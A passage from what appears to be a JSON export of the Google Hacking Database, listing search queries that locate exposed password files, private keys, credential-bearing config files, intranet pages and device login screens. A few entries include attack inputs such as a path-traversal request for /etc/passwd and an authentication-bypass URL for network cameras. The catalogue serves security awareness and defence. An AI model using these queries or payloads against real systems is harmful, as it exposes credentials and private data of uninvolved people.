        "textualDescription": "Reveals network maps (or any other kind you seek) that can provide sensitive information such as internal IPs, protocols, layout, firewall locations and types, etc. Attackers can use these files in an information gathering campaign."
    }, 
    {
        "signatureReferenceNumber": "234", 
        "link": "https://www.exploit-db.com/ghdb/234/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?ie=utf-8&oe=utf-8&q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22human+resources%22", 
        "shortDescription": "intitle:intranet inurl:intranet +intext:\"human resources\"", 
        "textualDescription": "According to whatis.com: \"An intranet is a private network that is contained within an enterprise. [...] The main purpose of an intranet is to share company information and computing resources among employees [...] and in general looks like a private version of the Internet.\"This search allows you to not only access a companies private network, but also provides employee listings and other sensitive information that can be incredibly useful for any social engineering endeavour"
    }, 
    {
        "signatureReferenceNumber": "235", 
        "link": "https://www.exploit-db.com/ghdb/235/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype:log+cron.log&spell=1", 
        "shortDescription": "filetype:log cron.log", 
        "textualDescription": "Displays logs from cron, the *nix automation daemon.  Can be used to determine backups, full and realtive paths, usernames, IP addresses and port numbers of trusted network hosts, or just about anything the admin of the box decides to automate.  An attacker could use this information to possibly determine what extra vulnerable services are running on the machine, to find the location of backups, and, if the sysadmin uses cron to backup their logfiles, this cron log will give that away too."
    }, 
    {
        "signatureReferenceNumber": "236", 
        "link": "https://www.exploit-db.com/ghdb/236/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Alog+access.log+-CVS&btnG=Google+Search", 
        "shortDescription": "filetype:log access.log -CVS", 
        "textualDescription": "These are http server access logs which contain all sorts of information ranging from usernames and passwords to trusted machines on the network to full paths on the server.  Could be VERY useful in scoping out a potential target."
    }, 
    {
        "signatureReferenceNumber": "237", 
        "link": "https://www.exploit-db.com/ghdb/237/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?&ie=utf-8&oe=utf-8&q=filetype%3Ablt+blt+%2Bintext%3Ascreenname", 
        "shortDescription": "filetype:blt blt +intext:screenname", 
        "textualDescription": "Reveals AIM buddy lists, including screenname and who's on their 'buddy' list and their 'blocked' list."
    }, 
    {
        "signatureReferenceNumber": "238", 
        "link": "https://www.exploit-db.com/ghdb/238/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Adat+%22password.dat%22", 
        "shortDescription": "filetype:dat \"password.dat\"", 
        "textualDescription": "This file contains plaintext usernames and password. Deadly information in the hands of an attacker."
    }, 
    {
        "signatureReferenceNumber": "239", 
        "link": "https://www.exploit-db.com/ghdb/239/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3Aintranet+inurl%3Aintranet+%2Bintext%3A%22phone%22", 
        "shortDescription": "intitle:intranet inurl:intranet +intext:\"phone\"", 
        "textualDescription": "These pages are often private intranet pages which contain phone listings and email addresses. These pages can be used as a sort of online \"dumpster dive\"."
    }, 
    {
        "signatureReferenceNumber": "240", 
        "link": "https://www.exploit-db.com/ghdb/240/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Aconf+slapd%2Econf", 
        "shortDescription": "filetype:conf slapd.conf", 
        "textualDescription": "slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff."
    }, 
    {
        "signatureReferenceNumber": "241", 
        "link": "https://www.exploit-db.com/ghdb/241/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Aphp.ini+filetype%3Aini", 
        "shortDescription": "inurl:php.ini filetype:ini", 
        "textualDescription": "The php.ini file contains all the configuration for how PHP is parsed on a server.  It can contain default database usernames, passwords, hostnames, IP addresses, ports, initialization of global variables and other information.  Since it is found by default in /etc, you might be able to find a lot more unrelated information in the same directory."
    }, 
    {
        "signatureReferenceNumber": "242", 
        "link": "https://www.exploit-db.com/ghdb/242/", 
        "category": "Web Server Detection", 
        "querystring": "http://www.google.com/search?q=DOMCFG.NSF&hl=en&lr=&ie=UTF-8&start=0&sa=N", 
        "shortDescription": "inurl:domcfg.nsf", 
        "textualDescription": "This will return a listing of servers running Lotus Domino.  These servers by default have very descriptive error messages which can be used to obtain path and OS information.  In addition, adding \"Login Form Mapping\" to the search will allow you to see detailed information about a few of the servers that have this option enabled."
    }, 
    {
        "signatureReferenceNumber": "243", 
        "link": "https://www.exploit-db.com/ghdb/243/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Apem+pem+intext%3Aprivate", 
        "shortDescription": "filetype:pem intext:private", 
        "textualDescription": "This search will find private key files... Private key files are supposed to be, well... private."
    }, 
    {
        "signatureReferenceNumber": "244", 
        "link": "https://www.exploit-db.com/ghdb/244/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&safe=off&q=%22Mercury+Version%22+%22Infrastructure+Group%22&spell=1", 
        "shortDescription": "\"Mecury Version\" \"Infastructure Group\"", 
        "textualDescription": "Mecury is a centralized ground control program for research satellites.  This query simply locates servers running this software.  As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it."
    }, 
    {
        "signatureReferenceNumber": "245", 
        "link": "https://www.exploit-db.com/ghdb/245/", 
        "category": "Files containing usernames", 
        "querystring": "http://www.google.com/search?q=filetype%3Aconf+inurl%3Aproftpd.conf+-sample+&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8", 
        "shortDescription": "filetype:conf inurl:proftpd.conf -sample", 
        "textualDescription": "A standard FTP configuration file that provides far too many details about how the server is setup, including installation paths,  location of logfiles, generic username and associated group, etc"
    }, 
    {
        "signatureReferenceNumber": "246", 
        "link": "https://www.exploit-db.com/ghdb/246/", 
        "category": "Footholds", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%2Bhtpasswd+%2BWS_FTP.LOG+filetyp", 
        "shortDescription": "+htpasswd +WS_FTP.LOG filetype:log", 
        "textualDescription": "WS_FTP.LOG can be used in many ways to find more information about a server. This query is very flexible, just substitute \"+htpasswd\" for \"+FILENAME\" and you may get several hits that you hadn't seen with the 'normal' search. Filenames suggested by the forum to explore are: phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet . The list goes on and on..A different approach might be \"allinurl: \"some.host.com\" WS_FTP.LOG filetype:log\" which tells you more about who's uploading files to a specific site."
    }, 
    {
        "signatureReferenceNumber": "247", 
        "link": "https://www.exploit-db.com/ghdb/247/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&q=%22error+found+handling+the+request%22+cocoon+filetype%3Axml", 
        "shortDescription": "\"error found handling the request\" cocoon filetype:xml", 
        "textualDescription": "Cocoon is an XML publishing framework. It allows you to define XML documents and transformations to be applied on it, to eventually generate a presentation format of your choice (HTML, PDF, SVG). For more information read http://cocoon.apache.org/2.1/overview.htmlThis Cocoon error displays library functions, cocoon version number, and full and/or relative path names."
    }, 
    {
        "signatureReferenceNumber": "248", 
        "link": "https://www.exploit-db.com/ghdb/248/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Big+Sister%22+%2B%22OK+Attention+Trouble%22&btnG=Search", 
        "shortDescription": "intitle:\"Big Sister\" +\"OK Attention Trouble\"", 
        "textualDescription": "This search reveals Internal network status information about services and hosts."
    }, 
    {
        "signatureReferenceNumber": "249", 
        "link": "https://www.exploit-db.com/ghdb/249/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22%2Fcricket%2Fgrapher.cgi%22&btnG=Search", 
        "shortDescription": "inurl:\"/cricket/grapher.cgi\"", 
        "textualDescription": "This search reveals information about internal networks, such as configuration, services, bandwidth."
    }, 
    {
        "signatureReferenceNumber": "250", 
        "link": "https://www.exploit-db.com/ghdb/250/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22cacti%22+%2Binurl%3A%22graph_view.php%22+%2B%22Settings+Tree+View%22+-cvs+-RPM&btnG=Search", 
        "shortDescription": "inurl:\"cacti\" +inurl:\"graph_view.php\" +\"Settings Tree View\" -cvs -RPM", 
        "textualDescription": "This search reveals internal network info including architecture, hosts and services available."
    }, 
    {
        "signatureReferenceNumber": "251", 
        "link": "https://www.exploit-db.com/ghdb/251/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22System+Statistics%22+%2B%22System+and+Network+Information+Center%22&btnG=Search", 
        "shortDescription": "intitle:\"System Statistics\" +\"System and Network Information Center\"", 
        "textualDescription": "This search reveals internal network information including network configuratino, ping times, services,  and host info."
    }, 
    {
        "signatureReferenceNumber": "252", 
        "link": "https://www.exploit-db.com/ghdb/252/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.de/search?hl=de&ie=UTF-8&q=inurl%3A%22wvdial.conf%22+intext%3A%22password%22&btnG=Suche&meta=", 
        "shortDescription": "inurl:\"wvdial.conf\" intext:\"password\"", 
        "textualDescription": "The wvdial.conf is used for dialup connections.it contains phone numbers, usernames and passwords in cleartext."
    }, 
    {
        "signatureReferenceNumber": "253", 
        "link": "https://www.exploit-db.com/ghdb/253/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Ainc+dbconn", 
        "shortDescription": "filetype:inc dbconn", 
        "textualDescription": "This file contains the username and password the website uses to connect to the db.  Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!"
    }, 
    {
        "signatureReferenceNumber": "254", 
        "link": "https://www.exploit-db.com/ghdb/254/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22slapd.conf%22+intext%3A%22credentials%22+-manpage+-%22Manual+Page%22+-man%3A+-sample&btnG=Search", 
        "shortDescription": "inurl:\"slapd.conf\" intext:\"credentials\" -manpage -\"Manual Page\" -man: -sample", 
        "textualDescription": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. The key \"credentinals\" contains passwords in cleartext."
    }, 
    {
        "signatureReferenceNumber": "255", 
        "link": "https://www.exploit-db.com/ghdb/255/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%22slapd.conf%22+intext%3A%22rootpw%22++-manpage+-%22Manual+Page%22+-man%3A+-sample&btnG=Search", 
        "shortDescription": "inurl:\"slapd.conf\" intext:\"rootpw\"  -manpage -\"Manual Page\" -man: -sample", 
        "textualDescription": "slapd.conf is the configuration file for slapd, the opensource LDAP deamon. You can view a cleartext or crypted password for the \"rootdn\"."
    }, 
    {
        "signatureReferenceNumber": "256", 
        "link": "https://www.exploit-db.com/ghdb/256/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aini+%2Bws_ftp+%2Bpwd&btnG=Search", 
        "shortDescription": "filetype:ini ws_ftp pwd", 
        "textualDescription": "The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the \"index of\" keyword or by searching directly for the PWD= value inside the configuration file."
    }, 
    {
        "signatureReferenceNumber": "257", 
        "link": "https://www.exploit-db.com/ghdb/257/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aforward+filetype%3Aforward+-cvs&btnG=Search", 
        "shortDescription": "inurl:forward filetype:forward -cvs", 
        "textualDescription": "Users on *nix boxes can forward their mail by placing a .forward file in their home directory. These files reveal email addresses."
    }, 
    {
        "signatureReferenceNumber": "258", 
        "link": "https://www.exploit-db.com/ghdb/258/", 
        "category": "Error Messages", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Invision+Power+Board+Database+Error%22&btnG=Search", 
        "shortDescription": "\"Invision Power Board Database Error\"", 
        "textualDescription": "These are SQL error messages, ranging from to many connections, access denied to user xxx, showing full path info to the php files etc.. There is an exploitable bug in version 1.1 of this software and the current version is 1.3 available for download on the site."
    }, 
    {
        "signatureReferenceNumber": "259", 
        "link": "https://www.exploit-db.com/ghdb/259/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Anetrc+password&btnG=Search", 
        "shortDescription": "filetype:netrc password", 
        "textualDescription": "The .netrc file is used for automatic login to servers. The passwords are stored in cleartext."
    }, 
    {
        "signatureReferenceNumber": "260", 
        "link": "https://www.exploit-db.com/ghdb/260/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=signin+filetype%3Aurl&btnG=Search", 
        "shortDescription": "signin filetype:url", 
        "textualDescription": "Javascript for user validation  is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that."
    }, 
    {
        "signatureReferenceNumber": "261", 
        "link": "https://www.exploit-db.com/ghdb/261/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Adat+wand.dat&btnG=Search", 
        "shortDescription": "filetype:dat wand.dat", 
        "textualDescription": "The world-famous web-browser Opera has the ability to save the password for you, and it call the system \"Magic Wand\". When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automaticly for you. What a joy! Opera saves this file on you'r computer, it is located (on winXP) here: D:\\Documents and Settings\\Peefy\\Programdata\\Opera\\Opera75\\profile\\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button."
    }, 
    {
        "signatureReferenceNumber": "262", 
        "link": "https://www.exploit-db.com/ghdb/262/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?q=%22Index+Of+%2Fnetwork%22+%22last+modified", 
        "shortDescription": "\"Index Of /network\" \"last modified\"", 
        "textualDescription": "Many of these directories contain information about the network, though an attacker would need  a considerable amount of patience to find it."
    }, 
    {
        "signatureReferenceNumber": "263", 
        "link": "https://www.exploit-db.com/ghdb/263/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3A%2Feprise%2F+&btnG=Search", 
        "shortDescription": "inurl:/eprise/", 
        "textualDescription": "silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires  NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen."
    }, 
    {
        "signatureReferenceNumber": "264", 
        "link": "https://www.exploit-db.com/ghdb/264/", 
        "category": "Sensitive Directories", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22album+permissions%22+%22Users+who+can+modify+photos%22+%22EVERYBODY%22&btnG=Search", 
        "shortDescription": "intitle:\"album permissions\" \"Users who can modify photos\" \"EVERYBODY\"", 
        "textualDescription": "Gallery (http://gallery.menalto.com) is software that allows users to create webalbums and upload pictures to it. In some installations Gallery lets you access the Admin permission page album_permissions.php without authentication. Even if not \"everybody\" has modify rights, an attacker can do a search for \"users who can see the album\" to retrieve valid usernames for the gallery."
    }, 
    {
        "signatureReferenceNumber": "265", 
        "link": "https://www.exploit-db.com/ghdb/265/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Acfg+mrtg+%22target%5B*%5D%22+-sample+-cvs+-example&btnG=Search", 
        "shortDescription": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", 
        "textualDescription": "Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example."
    }, 
    {
        "signatureReferenceNumber": "266", 
        "link": "https://www.exploit-db.com/ghdb/266/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aldb+admin&btnG=Google+Search", 
        "shortDescription": "filetype:ldb admin", 
        "textualDescription": "According to filext.com, the ldb file is \"A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.\" These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file."
    }, 
    {
        "signatureReferenceNumber": "267", 
        "link": "https://www.exploit-db.com/ghdb/267/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=inurl%3Ainstall.php+intitle%3AphpMySearch&btnG=Search", 
        "shortDescription": "inurl:search/admin.php", 
        "textualDescription": "phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised."
    }, 
    {
        "signatureReferenceNumber": "268", 
        "link": "https://www.exploit-db.com/ghdb/268/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Ar2w+r2w&btnG=Search", 
        "shortDescription": "filetype:r2w r2w", 
        "textualDescription": "WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example."
    }, 
    {
        "signatureReferenceNumber": "269", 
        "link": "https://www.exploit-db.com/ghdb/269/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Aphp+inurl%3AvAuthenticate&btnG=Search", 
        "shortDescription": "filetype:php inurl:vAuthenticate", 
        "textualDescription": "vAuthenticate is a multi-platform compatible PHP and MySQL script which allows creation of new user accounts new user groups, activate/inactivate groups or individual accounts, set user level, etc. There are two admin users by default with an easy to guess password. The backup admin user can *not* be deleted. There is also a test account with the same password that can not be deleted.An attacker can find the default passwords by downloading the software and browsing the .sql files. Default passwords are seldom changed if the user is not *forced* to change them first before using the sofware. This software doesn't enforce such a rule."
    }, 
    {
        "signatureReferenceNumber": "270", 
        "link": "https://www.exploit-db.com/ghdb/270/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22ZyXEL+Prestige+Router%22+%22Enter+password%22+", 
        "shortDescription": "intitle:\"ZyXEL Prestige Router\" \"Enter password\"", 
        "textualDescription": "This is the main authentication screen for the ZyXEL Prestige Router."
    }, 
    {
        "signatureReferenceNumber": "271", 
        "link": "https://www.exploit-db.com/ghdb/271/", 
        "category": "Vulnerable Servers", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Welcome+to+the+Prestige+Web-Based+Configurator%22+", 
        "shortDescription": "\"Welcome to the Prestige Web-Based Configurator\"", 
        "textualDescription": "This is the configuration screen for a Prestige router. This page indicates that the router has not yet been setup and any web user can make changes to the router."
    }, 
    {
        "signatureReferenceNumber": "272", 
        "link": "https://www.exploit-db.com/ghdb/272/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22ADSL+Configuration+page%22", 
        "shortDescription": "intitle:\"ADSL Configuration page\"", 
        "textualDescription": "This is the status screen for the Solwise ADSL modem. Information available from this page includes IP addresses, MAC addresses, subnet mask, firware version of the modem. Attackers can use this information to formulate an attack."
    }, 
    {
        "signatureReferenceNumber": "273", 
        "link": "https://www.exploit-db.com/ghdb/273/", 
        "category": "Network or vulnerability data", 
        "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22Version+Info%22+%22Boot+Version%22+%22Internet+Settings%22", 
        "shortDescription": "\"Version Info\" \"Boot Version\" \"Internet Settings\"", 
        "textualDescription": "This is the status page for a Belkin Cable/DSL gateway. Information can be retrieved from this page including IP addresses, WAN addresses, MAC addresses, firmware versions, serial numbers, subnet masks, firewall settings, encryption settings, NAT settings and SSID. Attackers can use this information to formulate an attack."
    }, 
    {
        "signatureReferenceNumber": "274", 
        "link": "https://www.exploit-db.com/ghdb/274/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Asql+%2B%22IDENTIFIED+BY%22+-cvs&btnG=Search", 
        "shortDescription": "filetype:sql +\"IDENTIFIED BY\" -cvs", 
        "textualDescription": "Database maintenance is often automated by use of .sql files wich may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses."
    }, 
    {
        "signatureReferenceNumber": "275", 
        "link": "https://www.exploit-db.com/ghdb/275/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Asql+password&btnG=Search", 
        "shortDescription": "filetype:sql password", 
        "textualDescription": "Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses."
    }, 
    {
        "signatureReferenceNumber": "276", 
        "link": "https://www.exploit-db.com/ghdb/276/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Welcome+Site%2FUser+Administrator%22+%22Please+select+the+language%22+-demos&btnG=Search", 
        "shortDescription": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", 
        "textualDescription": "service providers worldwide use Ensim's products to automate the  management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro."
    }, 
    {
        "signatureReferenceNumber": "277", 
        "link": "https://www.exploit-db.com/ghdb/277/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apwd+service&btnG=Search", 
        "shortDescription": "filetype:pwd service", 
        "textualDescription": "Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'."
    }, 
    {
        "signatureReferenceNumber": "278", 
        "link": "https://www.exploit-db.com/ghdb/278/", 
        "category": "Pages containing login portals", 
        "querystring": "http://www.google.co.uk/search?hl=en&ie=UTF-8&q=%22ttawlogin.cgi%2F%3Faction%3D%22&btnG=Search&meta=", 
        "shortDescription": "\"ttawlogin.cgi/?action=\"", 
        "textualDescription": "Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"
    }, 
    {
        "signatureReferenceNumber": "279", 
        "link": "https://www.exploit-db.com/ghdb/279/", 
        "category": "Various Online Devices", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3AindexFrame.shtml+Axis&btnG=Google+Search", 
        "shortDescription": "Axis Network Cameras", 
        "textualDescription": "The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------\"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.\" Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------\"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for \"admin\" is bypassed and an attacker gains direct access to the configuration."
    }, 
    {
        "signatureReferenceNumber": "280", 
        "link": "https://www.exploit-db.com/ghdb/280/", 
        "category": "Sensitive Online Shopping Info", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=POWERED+BY+HIT+JAMMER+1.0%21&btnG=Google+Search", 
        "shortDescription": "POWERED BY HIT JAMMER 1.0!", 
        "textualDescription": "Hit Jammer is a Unix compatible script that allows you to manage the content and traffic exchange and make web changes, all without needing HTML. It is typicaly used by the underground sites on the Net who \"pay for surfing ads\" and advertise spam services or software.An attacker can find these sites by searching for the typical \"powered by hit jammer !\" frase on the bottom of the main page. Then if he changes the URL to www.target.com/admin/admin.php he is taken to the admin panel. Hit Jammer administrators are warned to protect this page with the .htaccess logon procedure, but many fail to do just that. In such cases, customer information like email addresses and passwords are in clear view of the attacker. Since human beings often use one simple password for many things this is a very dangerous practice."
    }, 
    {
        "signatureReferenceNumber": "281", 
        "link": "https://www.exploit-db.com/ghdb/281/", 
        "category": "Files containing juicy info", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=94FBR+%22ADOBE+PHOTOSHOP%22&btnG=Search", 
        "shortDescription": "94FBR \"ADOBE PHOTOSHOP\"", 
        "textualDescription": "94FBR is part of many serials. An malicious user would only have to change the programm name (photoshop in this example) in this search to find a perfectly valid serial.Other values to look for are: GC6J3. GTQ62. FP876. D3DX8."
    }, 
    {
        "signatureReferenceNumber": "282", 
        "link": "https://www.exploit-db.com/ghdb/282/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=inurl%3Azebra.conf+intext%3Apassword+-sample+-test+-tutorial+-download&btnG=Google+Search", 
        "shortDescription": "inurl:zebra.conf intext:password -sample -test -tutorial -download", 
        "textualDescription": "GNU Zebra is free software that manages TCP/IP based routing protocols.  It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc."
    }, 
    {
        "signatureReferenceNumber": "283", 
        "link": "https://www.exploit-db.com/ghdb/283/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=inurl%3Aospfd.conf+intext%3Apassword+-sample+-test+-tutorial+-download&btnG=Search", 
        "shortDescription": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", 
        "textualDescription": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc."
    }, 
    {
        "signatureReferenceNumber": "284", 
        "link": "https://www.exploit-db.com/ghdb/284/", 
        "category": "Vulnerable Files", 
        "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+%2F%22+modified+php.exe&btnG=Search", 
        "shortDescription": "intitle:\"Index of /\" modified php.exe", 
        "textualDescription": "PHP installed as a cgi-bin on a Windows Apache server will allow an attacker to view arbitrary files on the hard disk, for example by requesting \"/php/php.exe?c:\\boot.ini.\""
    }, 
    {
        "signatureReferenceNumber": "285", 
        "link": "https://www.exploit-db.com/ghdb/285/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Alog+inurl%3Accbill", 
        "shortDescription": "inurl:ccbill filetype:log", 
        "textualDescription": "CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word \"hot\" in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242."
    }, 
    {
        "signatureReferenceNumber": "286", 
        "link": "https://www.exploit-db.com/ghdb/286/", 
        "category": "Files containing passwords", 
        "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Amdb+inurl%3Ausers.mdb&btnG=Google+Search", 
        "shortDescription": "filetype:mdb inurl:users.mdb", 
